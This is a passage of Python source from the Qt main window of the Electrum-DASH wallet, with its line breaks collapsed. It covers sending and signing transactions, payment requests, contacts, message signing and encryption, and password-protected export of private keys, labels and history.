redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_password(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def read_send_tab(self): if self.payment_request and self.payment_request.has_expired(): self.show_error(_('Payment request has expired')) return label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return outputs = self.payto_e.get_outputs(self.is_max) if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return if not outputs: self.show_error(_('No outputs')) return for _type, addr, amount in outputs: if addr is None: self.show_error(_('Dash Address is None')) return if _type == TYPE_ADDRESS and not bitcoin.is_address(addr): self.show_error(_('Invalid Dash Address')) return if amount is None: self.show_error(_('Invalid Amount')) return freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus()) fee = self.fee_e.get_amount() if freeze_fee else None coins = self.get_coins() return outputs, fee, label, coins def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if run_hook('abort_send', self): return r = self.read_send_tab() if not r: return outputs, fee, tx_desc, coins = r try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fee, is_sweep=is_sweep) except NotEnoughFunds: self.show_message(_("Insufficient funds")) return except BaseException as e: traceback.print_exc(file=sys.stdout) self.show_message(str(e)) return amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network")) return if preview: self.show_transaction(tx, tx_desc) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) confirm_rate = 2 * self.config.max_fee_rate() if fee > confirm_rate * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_password(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_signed(result): callback(True) def on_failed(exc_info): self.on_error(exc_info) callback(False) if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: # call hook to see if plugin needs gui interaction run_hook('sign_tx', self, tx) task = partial(self.wallet.sign_transaction, tx, password) WaitingDialog(self, _('Signing transaction...'), task, on_signed, on_failed) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status, msg = self.network.broadcast(tx) if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_addresses()[0] ack_status, ack_msg = pr.send_ack(str(tx), refund_address) if ack_status: msg = ack_msg return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window() def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.amount_e, self.message_e]: e.setFrozen(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): self.show_message(self.payment_request.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except BaseException as e: self.show_error(_('Invalid Dash URI:') + '\n' + str(e)) return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.is_max = False self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]: e.setText('') e.setFrozen(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.update_status() run_hook('do_clear', self) def set_frozen_state(self, addrs, freeze): self.wallet.set_frozen_state(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def create_list_tab(self, l, list_header=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) vbox.addWidget(l) if list_header: w.setObjectName("list_header") hbox = QHBoxLayout() for b in list_header: hbox.addWidget(b) hbox.addStretch() vbox.addLayout(hbox) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) l.setObjectName("addresses_container") return self.create_list_tab(l, l.get_list_header()) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) l.setObjectName("utxo_container") return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) l.setObjectName("contacts_container") return self.create_list_tab(l) def create_proposals_tab(self): from masternode_budget_widgets import ProposalsTab self.proposals_list = ProposalsTab(self) return self.proposals_list def update_proposals_tab(self): # Disabled until API is stable. return if not self.masternode_manager: return self.proposals_list.update(list(self.network.all_proposals)) def remove_address(self, addr): if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")): self.wallet.delete_address(addr) self.address_list.update() self.history_list.update() self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove %s from your list of contacts?") % " + ".join(labels)): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) pr.verify(self.contacts) self.show_pr_details(pr) def show_pr_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.invoices.remove(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def do_pay_invoice(self, key): pr = self.invoices.get(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() console.setObjectName("console_container") return console def update_console(self): console = self.console console.history = self.config.get("console-history",[]) console.history_index = len(console.history) console.updateNamespace({'wallet' : self.wallet, 'network' : self.network, 'plugins' : self.gui_object.plugins, 'window': self}) console.updateNamespace({'util' : util, 'bitcoin':bitcoin}) c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args: f(method, args, self.password_dialog) for m in dir(c): if m[0]=='_' or m in ['network','wallet']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) qtVersion = qVersion() self.balance_label = QLabel("") self.balance_label.setObjectName("main_window_balance") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.lock_icon = QIcon() self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.can_change_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from .password_dialog import ChangePasswordDialog d = ChangePasswordDialog(self, self.wallet) ok, password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(password, new_password, encrypt_file) except BaseException as e: self.show_error(str(e)) return except: traceback.print_exc(file=sys.stdout) self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(280) line2 = QLineEdit() line2.setFixedWidth(280) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + ' ' + str(key+1) return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) self.gui_object.daemon.stop_wallet(wallet_path) self.close() os.unlink(wallet_path) self.show_error("Wallet removed:" + basename) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: traceback.print_exc(file=sys.stdout) self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = ("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message('Invalid Dash address.') return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh']: self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign) return if not self.wallet.is_mine(address): self.show_message('Address not in wallet.') return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): signature.setText(base64.b64encode(sig).decode('ascii')) self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message('Invalid Dash address.') return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = bitcoin.verify_message(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8'))) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: encrypted = bitcoin.encrypt_message(message, pubkey_e.text()) encrypted_e.setText(encrypted.decode('ascii')) except BaseException as e: traceback.print_exc(file=sys.stdout) self.show_warning(str(e)) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum_dash.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum-DASH was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum_dash import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a dash URI if str(data).startswith("dash:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx data = bh2u(bitcoin.base_decode(data, length=None, base=43)) tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): from electrum_dash.transaction import SerializationError text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return try: tx = self.tx_from_text(text) if tx: self.show_transaction(tx) except SerializationError as e: self.show_critical(_("Electrum-DASH was unable to deserialize the transaction:") + "\n" + str(e)) def do_process_from_file(self): from electrum_dash.transaction import SerializationError try: tx = self.read_tx_from_file() if tx: self.show_transaction(tx) except SerializationError as e: self.show_critical(_("Electrum-DASH was unable to deserialize the transaction:") + "\n" + str(e)) def do_process_from_txid(self): from electrum_dash import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: r = self.network.synchronous_get(('blockchain.transaction.get',[txid])) except BaseException as e: self.show_message(str(e)) return tx = transaction.Transaction(r) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It can not be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(850, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-dash-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum-DASH was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: import json f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): labelsFile = self.getOpenFileName(_("Open labels file"), "*.json") if not labelsFile: return try: with open(labelsFile, 'r') as f: data = f.read() for key, value in json.loads(data).items(): self.wallet.set_label(key, value) self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile)) except (IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to import your labels.") + "\n" + str(reason)) self.address_list.update() self.history_list.update() def do_export_labels(self): labels = self.wallet.labels try: fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_dash_labels.json', "*.json") if fileName: with open(fileName, 'w+') as f: json.dump(labels, f, indent=4, sort_keys=True) self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName)) except (IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to export your labels.") + "\n" + str(reason)) def export_history_dialog(self): d = WindowModalDialog(self, _('Export History')) d.setMinimumSize(400, 200) vbox = QVBoxLayout(d) defaultname = os.path.expanduser('~/electrum-dash-history.csv') select_msg = _('Select file to export your wallet transactions to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) vbox.addStretch(1) hbox = Buttons(CancelButton(d), OkButton(d, _('Export'))) vbox.addLayout(hbox) run_hook('export_history_dialog', self, hbox) self.update() if not d.exec_(): return filename = filename_e.text() if not filename: return try: self.do_export_history(self.wallet, filename, csv_button.isChecked()) except (IOError, os.error) as reason: export_error_label = _("Electrum-DASH was unable to produce a transaction export.") self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history")) return self.show_message(_("Your wallet history has been successfully exported.")) def plot_history_dialog(self): if plot_history is None: return wallet = self.wallet history = wallet.get_history() if len(history) > 0: plt = plot_history(self.wallet, history) plt.show() def do_export_history(self, wallet, fileName, is_csv): history = wallet.get_history() lines = [] for item in history: tx_hash, height, confirmations, timestamp, value, balance = item if height>0: if timestamp is not None: time_string = format_time(timestamp) else: time_string = _("unverified") else: time_string = _("unconfirmed") if value is not None: value_string = format_satoshis(value, True) else: value_string = '--' if tx_hash: label = wallet.get_label(tx_hash) else: label = "" if is_csv: lines.append([tx_hash, label, confirmations, value_string, time_string]) else: lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string}) with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f, lineterminator='\n') transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"]) for line in lines: transaction.writerow(line) else: import json f.write(json.dumps(lines, indent = 4)) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_("Enter private keys:"))) keys_e = ScanQRTextEdit() keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text) f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(f) address_e.textChanged.connect(f) address_e.textChanged.connect(on_address) if not d.exec_(): return from electrum_dash.wallet import sweep_preparations try: self.do_clear() coins, keypairs = sweep_preparations(get_pk(), self.network) self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(get_address()) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) except BaseException as e: self.show_message(str(e)) return self.warn_if_watching_only() def _do_import(self, title, msg, func): text = text_dialog(self, title, msg + ' :', _('Import')) if not text: return bad = [] good = [] for key in str(text).split(): try: addr = func(key) good.append(addr) except BaseException as e: bad.append(key) continue if good: self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good)) if bad: self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad)) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses") self._do_import(title, msg, self.wallet.import_address) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title, msg = _('Import private keys'), _("Enter private keys") self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password)) def update_fiat(self): b = self.fx 